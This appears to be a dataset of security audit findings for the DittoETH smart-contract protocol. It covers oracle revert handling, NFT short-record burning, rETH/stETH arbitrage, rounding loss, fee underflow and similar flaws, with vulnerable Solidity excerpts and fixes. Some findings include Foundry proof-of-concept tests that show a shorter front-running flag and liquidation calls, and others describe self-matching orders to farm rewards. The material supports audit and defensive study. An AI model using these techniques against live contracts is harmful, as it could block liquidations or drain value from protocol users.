_setForcedBidPriceBuffer(address asset, uint8 value) private {\\n require(value >= 100, "below 1.0");\\n require(value <= 200, "above 2.0");\\n s.asset[asset].forcedBidPriceBuffer = value;\\n }\\n\\n function _setMinimumCR(address asset, uint8 value) private {\\n require(value >= 100, "below 1.0");\\n require(value <= 200, "above 2.0");\\n s.asset[asset].minimumCR = value;\\n require(\\n LibAsset.minimumCR(asset) < LibAsset.secondaryLiquidationCR(asset),\\n "above secondary liquidation"\\n );\\n }\\n```\\n
Value to which is checked the `>` operator should be 101, not 100.
The incorrect value for the require statement could lead to a restriction of precion for this parameters, it wouldn't be possible to input a net value of 100.
```\\n function _setInitialMargin(address asset, uint16 value) private {\\n require(value > 100, "below 1.0"); // @audit a value of 100 is 1x, so this should be > 101\\n s.asset[asset].initialMargin = value;\\n require(LibAsset.initialMargin(asset) < Constants.CRATIO_MAX, "above max CR");\\n }\\n\\n function _setPrimaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, "below 1.0"); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, "above 5.0");\\n require(value < s.asset[asset].initialMargin, "above initial margin");\\n s.asset[asset].primaryLiquidationCR = value;\\n }\\n\\n function _setSecondaryLiquidationCR(address asset, uint16 value) private {\\n require(value > 100, "below 1.0"); // @audit a value of 100 is 1x, so this should be > 101\\n require(value <= 500, "above 5.0");\\n require(value < s.asset[asset].primaryLiquidationCR, "above primary liquidation");\\n s.asset[asset].secondaryLiquidationCR = value;\\n }\\n```\\n
Unhandled chainlink revert in case its multisigs block access to price feeds
low
In some extreme cases, oracles can be taken offline or token prices can fall to zero. Therefore a call to `latestRoundData` could potentially revert and none of the circuit breakers would fallback to query any prices automatically.\\nAccording to Ditto's documentation in https://dittoeth.com/technical/oracles, there are two circuit breaking events if Chainlink data becomes unusable: Invalid Fetch Data and Price Deviation.\\nThe issue arises from the possibility that Chainlink multisignature entities might intentionally block access to the price feed. In such a scenario, the invocation of the `latestRoundData` function could potentially trigger a revert, rendering the circuit-breaking events ineffective in mitigating the consequences, as they would be incapable of querying any price data or specific information.\\nIn certain exceptional circumstances, Chainlink has already taken the initiative to temporarily suspend specific oracles. As an illustrative instance, during the UST collapse incident, Chainlink opted to halt the UST/ETH price oracle to prevent the dissemination of erroneous data to various protocols.\\nAdditionally, these dangerous oracle's scenarios are very well documented by OpenZeppelin in https://blog.openzeppelin.com/secure-smart-contract-guidelines-the-dangers-of-price-oracles. For our context:\\n"While currently there's no whitelisting mechanism to allow or disallow contracts from reading prices, powerful multisigs can tighten these access controls. In other words, the multisigs can immediately block access to price feeds at will. Therefore, to prevent denial of service scenarios, it is recommended to query ChainLink price feeds using a defensive approach with Solidity's try/catch structure. In this way, if the call to the price feed fails, the caller contract is still in control and can handle any errors safely and explicitly".\\nAlthough a fallback mechanism, specifically the TWAP, is in place to uphold system functionality in the event of Chainlink failure, it is imperative to note that Ditto's documentation explicitly underscores its substantial reliance on oracles. Consequently, it is imperative to address this issue comprehensively within the codebase, given that it pertains to one of the fundamental functionalities of the environment.\\nAs mentioned above, In order to mitigate the potential risks associated with a denial-of-service scenario, it is advisable to employ a `try-catch` mechanism when querying Chainlink prices in the function `getOraclePrice` under LibOracle.sol. Through this approach, in the event of a failure in the invocation of the price feed, the caller contract retains command and can adeptly manage any errors in a secure and explicit manner.\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/libraries/LibOracle.sol#L25-L32\\n```\\n (\\n uint80 baseRoundID,\\n int256 basePrice,\\n /*uint256 baseStartedAt*/\\n ,\\n uint256 baseTimeStamp,\\n /*uint80 baseAnsweredInRound*/\\n ) = baseOracle.latestRoundData();\\n```\\n\\nHere I enumerate some of the core functions that will be affected in case of an unhandled oracle revert:\\nFunction createMarket under OwnerFacet.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/facets/OwnerFacet.sol#L47-L68\\nFunction updateOracleAndStartingShort under LibOrders.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/libraries/LibOrders.sol#L812-L816\\nFunction getShortIdAtOracle under ViewFaucet.sol:\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/main/contracts/facets/ViewFacet.sol#L173-L187
Encase the invocation of the function `latestRoundData()` within a `try-catch` construct instead of invoking it directly. In circumstances where the function call results in a revert, the catch block may serve the purpose of invoking an alternative oracle or managing the error in a manner that is deemed appropriate for the system.
If a configured Oracle feed has malfunctioned or ceased operating, it will produce a revert when checking for `latestRoundData` that would need to be manually handled by the system.
```\\n (\\n uint80 baseRoundID,\\n int256 basePrice,\\n /*uint256 baseStartedAt*/\\n ,\\n uint256 baseTimeStamp,\\n /*uint80 baseAnsweredInRound*/\\n ) = baseOracle.latestRoundData();\\n```\\n
Owner of a bad ShortRecord can front-run flagShort calls AND liquidateSecondary and prevent liquidation
high
A shorter can keep a unhealthy short position open by minting an NFT of it and front-running attempts to liquidate it with a transfer of this NFT (which transfers the short position to the new owner)\\nA Short Record (SR) is a struct representing a short position that has been opened by a user. It holds different informations, such as how much collateral is backing the short, and how much debt it owe (this ratio is called Collateral Ratio or CR) At any time, any user can flag someone's else SR as "dangerous", if its debt grows too much compared to its collateral. This operation is accessible through `MarginCallPrimaryFacet::flagShort`, which check through the `onlyValidShortRecord` modifier that the SR isn't `Cancelled` If the SR is valid, then its debt/collateral ratio is verified, and if its below a specific threshold, flagged. But that also means that if a SR is considered invalid, it cannot be flagged. And it seems there is a way for the owner of a SR to cancel its SR while still holding the position.\\nThe owner of a SR can mint an NFT to represent it and make it transferable. This is done in 5 steps:\\n`TransferFrom` verify usual stuff regarding the NFT (ownership, allowance, valid receiver...)\\n`LibShortRecord::transferShortRecord` is called\\n`transferShortRecord` verify that SR is not `flagged` nor `Cancelled`\\nSR is deleted (setting its status to Cancelled)\\na new SR is created with same parameters, but owned by the receiver.\\nNow, let's see what would happen if Alice has a SR_1 with a bad CR, and Bob tries to flag it.\\nBob calls flagShorton SR_1, the tx is sent to the mempool\\nAlice is watching the mempool, and don't want her SR to be flagged:\\nShe front-run Bob's tx with a transfer of her SR_1 to another of the addresses she controls\\nNow Bob's tx will be executed after Alice's tx:\\nThe SR_1 is "deleted" and its status set to `Cancelled`\\nBob's tx is executed, and `flagShort` reverts because of the `onlyValidShortRecord`\\nAlice can do this trick again to keep here undercol SR until it can become dangerous\\nBut this is not over:\\nEven when her CR drops dangerously (CR<1.5), `liquidateSecondary` is also DoS'd as it has the same check for `SR.Cancelled`\\nAdd these tests to `ERC721Facet.t.sol` :\\nFront-running flag\\n```\\n function test_audit_frontrunFlagShort() public {\\n address alice = makeAddr("Alice"); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr("AliceSecondAddr");\\n address bob = makeAddr("Bob"); //Bob will try to flag Alice's short \\n address randomUser = makeAddr("randomUser"); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //ETH price drops from 4000 to 2666, making Alice's short flaggable because its < LibAsset.primaryLiquidationCR(asset)\\n setETH(2666 ether);\\n \\n // Alice saw Bob attempt to flag her short, so she front-run him and transfer the SR\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n \\n //Bob's attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n } \\n```\\n\\nFront-running liquidateSecondary\\n```\\n function test_audit_frontrunPreventFlagAndSecondaryLiquidation() public {\\n address alice = makeAddr("Alice"); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr("AliceSecondAddr");\\n address aliceThirdAddr = makeAddr("AliceThirdAddr");\\n address bob = makeAddr("Bob"); //Bob will try to flag Alice's short \\n address randomUser = makeAddr("randomUser"); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //set cRatio below 1.1\\n setETH(700 ether);\\n \\n //Alice is still blocking all attempts to flag her short by transfering it to her secondary address by front-running Bob\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n\\n //Alice front-run (again// rest of code) Bob and transfers the NFT to a third address she owns\\n vm.prank(aliceSecondAddr);\\n diamond.transferFrom(aliceSecondAddr, aliceThirdAddr, 1);\\n\\n //Bob's try again on the new address, but its attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n STypes.ShortRecord memory shortRecord = getShortRecord(aliceSecondAddr, Constants.SHORT_STARTING_ID);\\n depositUsd(bob, shortRecord.ercDebt);\\n vm.expectRevert(Errors.MarginCallSecondaryNoValidShorts.selector);\\n liquidateErcEscrowed(aliceSecondAddr, Constants.SHORT_STARTING_ID, DEFAULT_AMOUNT, bob);\\n }\\n```\\n
Owner of a bad ShortRecord can front-run flagShort calls AND liquidateSecondary and prevent liquidation
Because of this, a shorter could maintain the dangerous position (or multiple dangerous positions), while putting the protocol at risk.
```\\n function test_audit_frontrunFlagShort() public {\\n address alice = makeAddr("Alice"); //Alice will front-run Bob's attempt to flag her short\\n address aliceSecondAddr = makeAddr("AliceSecondAddr");\\n address bob = makeAddr("Bob"); //Bob will try to flag Alice's short \\n address randomUser = makeAddr("randomUser"); //regular user who created a bid order\\n \\n //A random user create a bid, Alice create a short, which will match with the user's bid\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, randomUser);\\n fundLimitShortOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, alice);\\n //Alice then mint the NFT associated to the SR so that it can be transfered\\n vm.prank(alice);\\n diamond.mintNFT(asset, Constants.SHORT_STARTING_ID);\\n\\n //ETH price drops from 4000 to 2666, making Alice's short flaggable because its < LibAsset.primaryLiquidationCR(asset)\\n setETH(2666 ether);\\n \\n // Alice saw Bob attempt to flag her short, so she front-run him and transfer the SR\\n vm.prank(alice);\\n diamond.transferFrom(alice, aliceSecondAddr, 1);\\n \\n //Bob's attempt revert because the transfer of the short by Alice change the short status to SR.Cancelled\\n vm.prank(bob);\\n vm.expectRevert(Errors.InvalidShortId.selector);\\n diamond.flagShort(asset, alice, Constants.SHORT_STARTING_ID, Constants.HEAD);\\n } \\n```\\n
Previous NFT owner can burn NFT from the new owner
high
Short records can be transferred as NFTs. Internally, the short record is deleted from the sender and re-created for the new owner (receiver). However, the `tokenId` of the deleted short record is not reset, allowing the previous NFT owner to burn the NFT from the new owner.\\nShort positions, i.e., short records, can be represented as an NFT (ERC-721) with a specific `tokenId`, storing the reference to the short record id in the `shortRecordId` property of the `nftMapping` mapping.\\nSuch a short record can be transferred to another address by sending the NFT to the new owner. Internally, when transferring the ERC-721 token, the `transferShortRecord` function is called (e.g., in line 162 of the `ERC721Facet.transferFrom` function).\\nThe `transferShortRecord` function first validates if the short record is transferable (e.g., not flagged and not canceled) and then calls the `deleteShortRecord` function in line 132 to delete the short record from the `shortRecords` mapping. Thereafter, a new short record with the values of the transferred short record is created with the new owner as the shorter, and the `nftMapping` struct is updated accordingly.\\ncontracts/libraries/LibShortRecord.sol#L132\\n```\\nfunction transferShortRecord(\\n address asset,\\n address from,\\n address to,\\n uint40 tokenId,\\n STypes.NFT memory nft\\n) internal {\\n AppStorage storage s = appStorage();\\n STypes.ShortRecord storage short = s.shortRecords[asset][from][nft.shortRecordId];\\n if (short.status == SR.Cancelled) revert Errors.OriginalShortRecordCancelled();\\n if (short.flaggerId != 0) revert Errors.CannotTransferFlaggedShort();\\n❌ deleteShortRecord(asset, from, nft.shortRecordId);\\n uint8 id = createShortRecord(\\n asset,\\n to,\\n SR.FullyFilled,\\n short.collateral,\\n short.ercDebt,\\n short.ercDebtRate,\\n short.zethYieldRate,\\n tokenId\\n );\\n if (id == Constants.SHORT_MAX_ID) {\\n revert Errors.ReceiverExceededShortRecordLimit();\\n }\\n s.nftMapping[tokenId].owner = to;\\n s.nftMapping[tokenId].shortRecordId = id;\\n}\\n```\\n\\nHowever, the `LibShortRecord.deleteShortRecord` function neglects to reset and delete the short record's `tokenId`, which is initially set to the `tokenId` of the newly minted NFT in line of the `ERC721Facet.mintNFT` function. Consequently, upon transferring the short record, the deleted short record still references the transferred NFT's `tokenId`, in addition to the new short record which also references the same `tokenId`. Thus, two short records (with different owners), one being even deleted, reference the same NFT token.\\nThis oversight leads to the following issues (with number 3 being the most severe):\\nThe `ERC721Facet.balanceOf` function will report an incorrect NFT token balance for the previous NFT owner: If the short record was only partially filled before transferring it as a NFT, the remaining short record can still be fully filled, resetting the `SR.Cancelled` status. This will cause the `balanceOf` function to include this short record, and due to the short record still referencing the transferred NFT's `tokenId`, this NFT is still counted as owned by the previous owner.\\nThe previous NFT owner can not tokenize the remaining short record: As the `tokenId` of the deleted short record is not reset, the previous owner can not tokenize the remaining short record as any attempt to mint a new NFT via the `ERC721Facet.mintNFT` function will revert with the `Errors.AlreadyMinted` error.\\nThe previous NFT owner can burn the NFT from the new owner: As the `tokenId` of the deleted and partially filled short record is not reset, the short can be fully filled, resetting the `SR.Cancelled` status. By subsequently combining this short with another short using the `ShortRecordFacet.combineShorts` function, the combined shorts will have their associated NFT burned.\\nPlease note that the owner of the transferred short record can re-mint a NFT for the short via the `ERC721Facet.mintNFT`, but if the owner is a contract, the contract may lack the required functionality to do so.\\nThe following test case demonstrates the outline issue 3 above:\\n
Consider resetting the `tokenId` of the deleted short record in the `LibShortRecord.deleteShortRecord` function.
The previous NFT owner can burn the NFT from the new owner.\\nIf this NFT transfer was part of a trade and, for instance, sent to an escrow contract, the previous NFT owner can burn the NFT from the escrow contract, while the escrow contract lacks the functionality to re-mint the NFT for the short record. This renders the short record unusable, and funds (collateral) associated with the short record are lost.
```\\nfunction transferShortRecord(\\n address asset,\\n address from,\\n address to,\\n uint40 tokenId,\\n STypes.NFT memory nft\\n) internal {\\n AppStorage storage s = appStorage();\\n STypes.ShortRecord storage short = s.shortRecords[asset][from][nft.shortRecordId];\\n if (short.status == SR.Cancelled) revert Errors.OriginalShortRecordCancelled();\\n if (short.flaggerId != 0) revert Errors.CannotTransferFlaggedShort();\\n❌ deleteShortRecord(asset, from, nft.shortRecordId);\\n uint8 id = createShortRecord(\\n asset,\\n to,\\n SR.FullyFilled,\\n short.collateral,\\n short.ercDebt,\\n short.ercDebtRate,\\n short.zethYieldRate,\\n tokenId\\n );\\n if (id == Constants.SHORT_MAX_ID) {\\n revert Errors.ReceiverExceededShortRecordLimit();\\n }\\n s.nftMapping[tokenId].owner = to;\\n s.nftMapping[tokenId].shortRecordId = id;\\n}\\n```\\n
Instant arbitrage opportunity through rETH and stETH price discrepancy
low
User can choose to withdraw their zETH to be a rETH or stETH, while in reality most user will choose the best return (highest value between rETH and stETH), instant arbitrage will happen and this will trigger pool imbalance, draining one over the other.\\nIn DittoETH, they accept two special types of Ethereum tokens: rETH and stETH. These tokens are based on regular ETH but are designed to stay close in value to one regular Ether. However, in reality, they can have slightly different values. rETH, stETH.\\nIn practice, when user want to withdraw, they can choose between rETH and stETH based on which one is worth more at that moment. The system doesn't really care which one you put in when a user first deposited their asset.\\nNow, here's where it gets interesting. Because rETH and stETH can have slightly different values, a savvy user could deposit the cheaper one, get a zeth, and then withdraw the more valuable rETH and stETH. a quick way to make some extra profit\\nAs we can see on line 110-112, the rETH or stETH withdrawn is depends on `ethAmount`, which from `_ethConversion` it's amount is 'equal' between rETH and stETH\\n```\\nFile: BridgeRouterFacet.sol\\n function withdraw(address bridge, uint88 zethAmount)\\n external\\n nonReentrant\\n onlyValidBridge(bridge)\\n {\\n if (zethAmount == 0) revert Errors.ParameterIsZero();\\n uint88 fee;\\n uint256 withdrawalFee = bridge.withdrawalFee();\\n uint256 vault;\\n if (bridge == rethBridge || bridge == stethBridge) {\\n vault = Vault.CARBON;\\n } else {\\n vault = s.bridge[bridge].vault;\\n }\\n if (withdrawalFee > 0) {\\n fee = zethAmount.mulU88(withdrawalFee);\\n zethAmount -= fee;\\n s.vaultUser[vault][address(this)].ethEscrowed += fee;\\n }\\n uint88 ethAmount = _ethConversion(vault, zethAmount);\\n vault.removeZeth(zethAmount, fee);\\n IBridge(bridge).withdraw(msg.sender, ethAmount);\\n emit Events.Withdraw(bridge, msg.sender, zethAmount, fee);\\n }\\n// rest of code\\n function _ethConversion(uint256 vault, uint88 amount) private view returns (uint88) {\\n uint256 zethTotalNew = vault.getZethTotal();\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (zethTotalNew >= zethTotal) {\\n // when yield is positive 1 zeth = 1 eth\\n return amount;\\n } else {\\n // negative yield means 1 zeth < 1 eth\\n return amount.mulU88(zethTotalNew).divU88(zethTotal);\\n }\\n }\\n```\\n
Consider to use oracle to adjust the price difference between rETH and stETH
Instant arbitrage opportunity through rETH and stETH price discrepancy, will also trigger imbalance between rETH and stETH pool.
```\\nFile: BridgeRouterFacet.sol\\n function withdraw(address bridge, uint88 zethAmount)\\n external\\n nonReentrant\\n onlyValidBridge(bridge)\\n {\\n if (zethAmount == 0) revert Errors.ParameterIsZero();\\n uint88 fee;\\n uint256 withdrawalFee = bridge.withdrawalFee();\\n uint256 vault;\\n if (bridge == rethBridge || bridge == stethBridge) {\\n vault = Vault.CARBON;\\n } else {\\n vault = s.bridge[bridge].vault;\\n }\\n if (withdrawalFee > 0) {\\n fee = zethAmount.mulU88(withdrawalFee);\\n zethAmount -= fee;\\n s.vaultUser[vault][address(this)].ethEscrowed += fee;\\n }\\n uint88 ethAmount = _ethConversion(vault, zethAmount);\\n vault.removeZeth(zethAmount, fee);\\n IBridge(bridge).withdraw(msg.sender, ethAmount);\\n emit Events.Withdraw(bridge, msg.sender, zethAmount, fee);\\n }\\n// rest of code\\n function _ethConversion(uint256 vault, uint88 amount) private view returns (uint88) {\\n uint256 zethTotalNew = vault.getZethTotal();\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (zethTotalNew >= zethTotal) {\\n // when yield is positive 1 zeth = 1 eth\\n return amount;\\n } else {\\n // negative yield means 1 zeth < 1 eth\\n return amount.mulU88(zethTotalNew).divU88(zethTotal);\\n }\\n }\\n```\\n
Division before multiplication results in lower `dittoMatchedShares` distributed to users
medium
Shares amount is rounded down to number of days staked. Max truncation is 1 day, min time is 14 days. At most 1 / 14 * 100% = 7.1% of accrued shares will be truncated.\\nDivision before multiplication\\n```\\n uint88 shares = eth * (timeTillMatch / 1 days);\\n```\\n\\nSuppose `timeTillMatch = 14.99 days`, `eth = 1e18`. Expected result is `14.99 * 1e18 / 1 = 14.99e18 shares`. Actual result is `1e18 * (14.99 / 1) = 14e18 shares`
```\\n- uint88 shares = eth * (timeTillMatch / 1 days);\\n+ uint88 shares = uint88(uint256(eth * timeTillMatch) / 1 days);\\n```\\n
Up to 7.1% of user's shares will be truncated
```\\n uint88 shares = eth * (timeTillMatch / 1 days);\\n```\\n
Using a cached price in the critical shutdownMarket()
medium
The `MarketShutdownFacet::shutdownMarket()` is a critical function allowing anyone to freeze the market permanently. The function determines whether or not the market will be frozen based on the asset collateral ratio calculated from a cached price, which can be outdated (too risky for this critical function).\\nOnce the market is frozen, no one can unfreeze it.\\nThe `shutdownMarket()` allows anyone to call to freeze the market permanently when the asset collateral ratio threshold (default of 1.1 ether) has been reached. Once the market is frozen, all shorters will lose access to their positions. Even the protocol's DAO or admin cannot unfreeze the market. Therefore, the `shutdownMarket()` becomes one of the most critical functions.\\nTo calculate the asset collateral ratio (cRatio), the `shutdownMarket()` executes the `_getAssetCollateralRatio()`. However, the `_getAssetCollateralRatio()` calculates the `cRatio` using the cached price loaded from the `LibOracle::getPrice()`.\\nUsing the cached price in a critical function like `shutdownMarket()` is too risky, as the cached price can be outdated. The function should consider only a fresh price queried from Chainlink.\\n```\\n function shutdownMarket(address asset)\\n external\\n onlyValidAsset(asset)\\n isNotFrozen(asset)\\n nonReentrant\\n {\\n uint256 cRatio = _getAssetCollateralRatio(asset);\\n if (cRatio > LibAsset.minimumCR(asset)) {\\n revert Errors.SufficientCollateral();\\n } else {\\n STypes.Asset storage Asset = s.asset[asset];\\n uint256 vault = Asset.vault;\\n uint88 assetZethCollateral = Asset.zethCollateral;\\n s.vault[vault].zethCollateral -= assetZethCollateral;\\n Asset.frozen = F.Permanent;\\n if (cRatio > 1 ether) {\\n // More than enough collateral to redeem ERC 1:1, send extras to TAPP\\n uint88 excessZeth =\\n assetZethCollateral - assetZethCollateral.divU88(cRatio);\\n s.vaultUser[vault][address(this)].ethEscrowed += excessZeth;\\n // Reduces c-ratio to 1\\n Asset.zethCollateral -= excessZeth;\\n }\\n }\\n emit Events.ShutdownMarket(asset);\\n }\\n\\n // rest of code\\n\\n function _getAssetCollateralRatio(address asset)\\n private\\n view\\n returns (uint256 cRatio)\\n {\\n STypes.Asset storage Asset = s.asset[asset];\\n return Asset.zethCollateral.div(LibOracle.getPrice(asset).mul(Asset.ercDebt));\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L36\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L37\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L44\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/facets/MarketShutdownFacet.sol#L99
Using a cached price in the critical shutdownMarket()\\nThe `shutdownMarket()` requires the most accurate price, not just a cached price. Execute the `LibOracle::getOraclePrice()` to get the accurate price from Chainlink.
Using the cached price in a critical function like `shutdownMarket()` is too risky, as the cached price can be outdated.\\nOnce the market is frozen, all shorters will lose access to their positions. Even the protocol's DAO or admin cannot unfreeze the market.
```\\n function shutdownMarket(address asset)\\n external\\n onlyValidAsset(asset)\\n isNotFrozen(asset)\\n nonReentrant\\n {\\n uint256 cRatio = _getAssetCollateralRatio(asset);\\n if (cRatio > LibAsset.minimumCR(asset)) {\\n revert Errors.SufficientCollateral();\\n } else {\\n STypes.Asset storage Asset = s.asset[asset];\\n uint256 vault = Asset.vault;\\n uint88 assetZethCollateral = Asset.zethCollateral;\\n s.vault[vault].zethCollateral -= assetZethCollateral;\\n Asset.frozen = F.Permanent;\\n if (cRatio > 1 ether) {\\n // More than enough collateral to redeem ERC 1:1, send extras to TAPP\\n uint88 excessZeth =\\n assetZethCollateral - assetZethCollateral.divU88(cRatio);\\n s.vaultUser[vault][address(this)].ethEscrowed += excessZeth;\\n // Reduces c-ratio to 1\\n Asset.zethCollateral -= excessZeth;\\n }\\n }\\n emit Events.ShutdownMarket(asset);\\n }\\n\\n // rest of code\\n\\n function _getAssetCollateralRatio(address asset)\\n private\\n view\\n returns (uint256 cRatio)\\n {\\n STypes.Asset storage Asset = s.asset[asset];\\n return Asset.zethCollateral.div(LibOracle.getPrice(asset).mul(Asset.ercDebt));\\n }\\n```\\n
Malicious trader can intentionally obtain `dittoMatchedShares` in some edges cases
low
Malicious trader can intentionally obtain `dittoMatchedShares` by creating a bid order using a low price that nobody will ask, then wait for more than 14 days and the same malicious trader create an ask order using the same bid's low price causing the increase of `dittoMatchedShares`.\\nMalicious trader can create a bid order using the BidOrdersFacet::createBid() function at very low price, then the same malicious trader can wait some days until the minumum required in order to get `dittoMatchedShares` and set a `ask` order using the bid's low price. Please consider the next scenario:\\n```\\nMarket status:\\nassetX: current price 100\\n```\\n\\nMalicious trader creates the `bid order` for the `assetX` using the `price: 10` (low price compared to the current 100 price) and `ercAmount 10`. The low price is because nobody wants to sell at that price so the order can stay there without be matched.\\nThe `bid order` will be submitted to the order book because there are not `asks/sells` to fill at that price.\\nMalicious trader waits for more than 14 days. Additionally the malicious trader needs to wait until there are not `asks/sells` in the order book.\\nOnce the step 3 is ok, the Malicious trader creates the `ask order` at `price 10 and ercAmount10` (the bid's order price from step 1). The order is matched with the `bid order` from the step 1 and `dittoMatchedShares` are assigned to the malicious trader.\\nIt is a very edge case because the malicious trader needs an empty `ask/sells` orderbook so he can put his own `ask order` at the malicious bid order price but in conditions where the asset is not very trader the malicious actor can benefit from this.
Verify that the address from the `bid order` is not the same address who is creating the `ask` order.
Malicious actor can intentionally obtain `dittoMatchedShares` using `bid/asks` orders that he intentionally crafts. The `bid/ask` orders are created by the same malicious actor, so he won't lose assets.\\nTools used\\nManual review
```\\nMarket status:\\nassetX: current price 100\\n```\\n
Primary liquidation fee distribution may revert due to the inability to cover the caller fees
medium
Fee distribution during the primary short liquidation may revert due to an arithmetic underflow error in case the TAPP's escrowed ETH balance is insufficient to cover the caller (liquidator) fees.\\nDuring the primary liquidation, the `_marginFeeHandler` function called in line 126 handles the fee distribution for the liquidator (i.e., caller).\\nIf the eligible caller fee (callerFee) is less or equal to the ETH escrowed by the TAPP, the fee is deducted from `TAPP.ethEscrowed` and added to the liquidators escrowed ETH balance, `VaultUser.ethEscrowed`, in lines 271-274.\\nOtherwise, if the TAPP's escrowed ETH is insufficient to cover the caller fees, i.e., the `else` branch in line 274, the caller is given the `tappFee` instead of `gasFee`.\\nHowever, if `m.totalFee` exceeds the TAPP's `ethEscrowed`, it reverts with an arithmetic underflow error in line 278. This can be the case if the TAPP has little to no ETH escrowed after placing the forced bid as part of the liquidation, attempting to buy the debt token amount required to repay the short position's debt. In case the short's collateral is not sufficient to buy the debt tokens, the TAPP's escrowed ETH is utilized as well, potentially depleting the TAPP's escrowed ETH.\\nConsequently, the remaining `TAPP.ethEscrowed` is potentially lower than the calculated `m.totalFee`, resulting in the arithmetic underflow error in line 278.\\ncontracts/facets/MarginCallPrimaryFacet.sol#L278\\n```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n❌ TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n
Primary liquidation fee distribution may revert due to the inability to cover the caller fees\\nConsider checking if the TAPP's `ethEscrowed` is sufficient to cover the `m.totalFee` before deducting the fee from the TAPP's `ethEscrowed` balance and if not, give the caller the TAPP's `ethEscrowed` balance.
The primary short liquidation fails, requiring to wait until the short position's collateral is sufficient to buy the debt tokens or the TAPP has sufficient collateral, or, if the short's collateral ratio further decreases, the short position is liquidated via the secondary liquidation (which adds additional risk to the peg of the asset as the overall collateral ratio could fall below 100%).
```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n❌ TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n
Flag can be overriden by another user
high
